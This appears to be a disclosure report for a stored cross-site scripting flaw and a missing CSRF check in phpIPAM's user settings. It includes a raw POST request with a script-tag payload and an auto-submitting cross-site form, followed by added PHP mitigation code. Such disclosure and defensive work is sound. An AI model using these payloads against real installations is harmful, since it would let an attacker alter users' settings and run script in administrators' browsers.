```php
<td><?php print $user->theme=="" ? _("Default") : $user->theme ?></td>
```
in /app/admin/users/print-user.php is vulnerable to XSS.

Poc1:

Attacker:
Change theme parameter in user settings.

```
POST /app/tools/user-menu/user-edit.php

real_name=test&email=test%40test.com&password1=&password2=&theme=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&lang=1&mailNotify=No&mailChangelog=No&menuCompact=1&menuType=Dynamic
```

Victim:
View attacker user in admin panel
(/index.php?page=administration&section=users&subnetId=ID)

Poc2:
/app/tools/user-menu/user-edit.php is vulnerable to CSRF.
An attacker can create a page with the following snippet and cause any user to change their settings and later trigger the XSS-vuln.

```html
<form method="POST" action="http://localhost/phpipam/app/tools/user-menu/user-edit.php">
  <input type="hidden" value="test" name="real_name">
  <input type="hidden" value="test@test.com" name="email">
  <input type="hidden" value="" name="password1">
  <input type="hidden" value="" name="password2">
  <input type="hidden" value="<script>alert('XSS');</script>" name="theme">
  <input type="hidden" value="1" name="lang">
  <input type="hidden" value="No" name="mailNotify">
  <input type="hidden" value="No" name="mailChangelog">
  <input type="hidden" value="1" name="menuCompact">
  <input type="hidden" value="Dynamic" name="menuType">
  <input type="submit" value="">
</form>
<script>document.forms[0].submit();</script>
```
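
Output encoding, input allowlisting and a CSRF token check for the `theme` field and the `user-edit.php` request described above, as an added example that is not part of the original issue and is not phpIPAM's own fix. The function names, the `csrf` field name and the theme allowlist are assumptions.

```php
<?php
// Added example, not phpIPAM code. Helper names, the 'csrf' field name
// and the theme allowlist are assumptions made for illustration.

// Hypothetical allowlist; the report does not list the valid theme names.
const ALLOWED_THEMES = ['', 'dark', 'white'];

// Output side: encode the stored value for an HTML text context before
// printing it. The literal 'Default' stands in for _("Default").
function render_theme_cell(string $theme): string
{
    $label = $theme === '' ? 'Default' : $theme;
    return '<td>' . htmlspecialchars($label, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// Input side: accept only theme names that are on the allowlist.
function validate_theme(string $theme): bool
{
    return in_array($theme, ALLOWED_THEMES, true);
}

// CSRF: issue a random per-session token to embed in the settings form.
function issue_csrf_token(array &$session): string
{
    $session['csrf'] = bin2hex(random_bytes(32));
    return $session['csrf'];
}

// CSRF: on POST, require the token and compare it in constant time.
function check_csrf_token(array $session, array $post): bool
{
    return isset($session['csrf'], $post['csrf'])
        && is_string($post['csrf'])
        && hash_equals($session['csrf'], $post['csrf']);
}

// Constructed input: the theme value from the report, URL-decoded, arriving
// in a cross-site form post that cannot know the session's token.
$session = [];
$token   = issue_csrf_token($session);
$forged  = ['theme' => "<script>alert('XSS');</script>"];

var_dump(check_csrf_token($session, $forged));            // forged request, no token
var_dump(validate_theme($forged['theme']));               // value is not a theme name
echo render_theme_cell($forged['theme']), PHP_EOL;        // encoded even if it had been stored
var_dump(check_csrf_token($session, ['csrf' => $token])); // form rendered by the application
```

The three checks are independent layers: the token check stops the cross-site post, the allowlist stops the value from being stored, and the encoding in `render_theme_cell` keeps any already stored value from being interpreted as markup in the admin view.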